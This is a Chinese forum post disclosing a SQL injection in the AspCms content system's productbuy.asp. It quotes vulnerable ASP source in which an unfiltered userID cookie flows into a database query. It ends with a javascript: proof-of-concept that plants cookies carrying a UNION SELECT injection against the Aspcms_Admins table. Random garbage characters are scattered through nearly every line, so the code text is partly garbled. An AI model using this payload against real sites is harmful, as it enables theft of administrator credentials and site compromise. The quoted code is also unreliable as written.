好久没上土司了,上来一看发现在删号名单内.....
- v8 ^- i6 T" s也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。9 T( m( `0 [5 R$ _/ Y
废话不多说,看代码:. ^9 X, l U' \1 l/ [. d7 n
2 Y+ W* O7 b7 z3 u
<%( d0 g9 u" c/ S- h9 p
9 [2 R9 t+ u- b% k2 _$ R# n! Fif action = "buy" then
0 y0 d F; O7 q3 q
: o' T$ f1 |# ]% I" b addOrder()
4 u, C6 G% d: |7 z4 S8 P" v: `9 h+ o0 U& j5 y8 q/ C
else( x/ \. ~1 r$ B; y, V
* @5 @5 F9 i! b" h# w
echoContent()" J7 E* U" ?0 B% } b; {9 g
: ?4 D5 x$ p; p8 D2 B% Dend if
) \. \& B0 `$ B* e! |) W1 A" q$ y) n$ V/ k C- \
% c. z6 E/ c% N3 X$ ]# n' j
0 {% g/ m5 {, b6 t8 D
……略过
* I" T5 I9 t# W
, |8 N g; G; R" Z9 G2 `9 @" V+ F' t$ J) J3 M5 m9 A/ Z, @
4 n( x# k" L/ `* M
Sub echoContent()2 j( ?" W7 g3 S
. o( a( V# L* \) V dim id
/ B# k; [, X, Y
; H8 ` G. x! M( u id=getForm("id","get")( | _5 W1 |+ z! v
+ m9 v7 R- l9 c7 }, e, l) v8 r : n+ n" [" O2 Z# L9 ]7 H/ L5 @& ?
5 q7 E& e3 _9 Q3 E
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" G, I* F1 A a1 N, n
3 j$ s7 W# s+ {- n1 L/ U; n" _
6 ]! N, N7 w4 S' X. A" B n$ [: H, f6 }
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")( a- T9 \: l F
# E; A! k" ]6 N, i7 m2 z9 b# C dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
1 w& ]5 ]0 F5 q+ D- S$ [+ o" \9 f N% ?0 n9 p0 k
Dim templatePath,tempStr5 V5 b' ~8 {1 \. F' Q
) z! m/ y6 P" t+ i3 J templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"9 }% S4 c# y: z
% b+ ~/ I# |2 G* V- m9 y; O+ }2 c
: X0 t3 e) D. M& r9 e& d" s2 V, {; F
0 q! ^; A8 s( b
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")) t/ f U" v1 X0 v# _
# A, ^% f0 O/ h. V4 O
selectproduct=rsObj(0)
# d9 E6 `/ d/ ~& R" n$ |: t" I5 F- O. c5 a2 H Z
8 {! f/ i3 |3 S8 r7 m
" @3 f1 W$ x3 n1 f Dim linkman,gender,phone,mobile,email,qq,address,postcode8 `3 J# M3 s3 H, e( v0 k
% I7 t1 |# k' R% C# d& J
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",05 J2 ~. b% H! N' ^ l
9 `- i$ Q) [6 b* k" C4 l
if rCookie("loginstatus")=1 then ! o2 S. X- W V% K
+ {3 {% f2 U- U B4 W0 L
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")$ U9 O+ `' m5 A4 M' K5 o0 `
; f% |9 u* a. w$ l4 t linkman=rsObj("truename")
$ ^( b9 e( O0 b' o6 I" \- K6 P5 v9 R7 {8 {- ~. O
gender=rsObj("gender")
# X# X0 F! t5 [* d; Z# D6 X6 b6 I p8 M( r+ C0 w' h% g- X: E
phone=rsObj("phone")' N4 `: _6 i9 c4 e, m
5 v7 z# ~) G& g mobile=rsObj("mobile")" R& B$ }+ T) p! i3 k
. v% p8 n3 y4 [, B( v* D
email=rsObj("email")' F9 ^6 o; Z9 d) ~ b. H
4 f9 J- H- H( T/ G6 R. F# K qq=rsObj("qq")) V7 e; ~% X k9 \. G# u- S m
: @% h; S6 z: O' {0 J; x) }
address=rsObj("address")) Q( i4 A B2 `( ^* y6 q! D
1 k# x7 \2 ?- ?4 u* w- \4 Q$ O% B postcode=rsObj("postcode")6 A3 [' _% d- [# L/ \4 O
: M, M. x. n4 O$ x; j4 e
else ' k: g4 K' K) V& }
~ s9 |# O( b E# U
gender=1
; ]% S. s# Q5 Y; A/ L& w" R# L& \( x# a1 k1 I
end if. U0 T0 h- T6 |2 U% h: n
& A& a8 D) j7 l& y5 |( ?6 v& {
rsObj.close()
: ^7 s8 u/ b2 _$ Z# y2 l( P) C4 w' ~
. l9 l# f8 q/ B* I. N* ?- I* r
* j* J- G$ z H- ]$ a3 _ @ O% z9 H with templateObj
3 u7 U; s. ?5 f/ r5 `9 J4 M
) z" r: }7 o+ h' y .content=loadFile(templatePath)
9 z4 `0 ]' \- \- {. h w9 I
0 o' K& }; ^2 z* N) ] .parseHtml()3 z9 S: K d W! j# u& b$ Q2 I
: |( ~; q( {7 {# z5 H
.content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
2 H% ], o6 d7 {* @; ^) h% L2 z3 `0 V# C O, b& j
.content=replaceStr(.content,"[aspcms:linkman]",linkman) $ w0 I3 _2 C+ R0 F8 V& F. |
; ~7 S4 H# }9 ~0 U; D
.content=replaceStr(.content,"[aspcms:gender]",gender)
! l8 [9 j2 d& u1 d& S$ d( a) P: G+ ^! m6 Q2 ~
.content=replaceStr(.content,"[aspcms:phone]",phone) ` M5 D5 G9 X |5 a; ^' @
' m: a8 }4 c/ D. @2 O! _7 s7 m
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
B. P& M" Q3 E
5 _# v" i/ [2 u+ l8 w% z7 w .content=replaceStr(.content,"[aspcms:email]",email) - m8 i1 |' Y' {8 w: c C
, v1 x3 @( ^" U& b .content=replaceStr(.content,"[aspcms:qq]",qq) 4 I! y: S9 \" J# c2 W; `
' H! U0 b( E5 X. K6 m .content=replaceStr(.content,"[aspcms:address]",address)
l( k7 b- M. x( _7 G$ @( ?
9 C4 K/ ~3 [$ j2 l. d1 l1 f3 I .content=replaceStr(.content,"[aspcms:postcode]",postcode) " L8 _- O" Y6 P3 E8 |
2 W5 a$ z9 k: M$ ^- ~ .parseCommon() + M8 _( y0 }0 I
3 m# m0 t, }7 e echo .content * ]) \5 _6 u7 p
1 c: Z( J& D, D5 K/ ~7 B2 G: u( Q0 a( ]& K
end with2 g) L: v# b& A2 _
8 }) n0 w; Y( ?7 v) H6 g set templateobj =nothing : terminateAllObjects
/ y* o8 h/ f6 Z# L: _
- Z! i& @6 h/ }# S3 wEnd Sub
6 O3 s `6 ~5 H5 d漏洞很明显,没啥好说的
; {; g" d5 a5 e1 o% U* } Cpoc:
1 B- h) O; M1 z$ ~9 f! S% }5 t1 d- k% R) ]; s" Q2 y( E
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子
# p/ F# c5 Y; S# ]; h7 N
) K9 v7 N1 t5 h: s |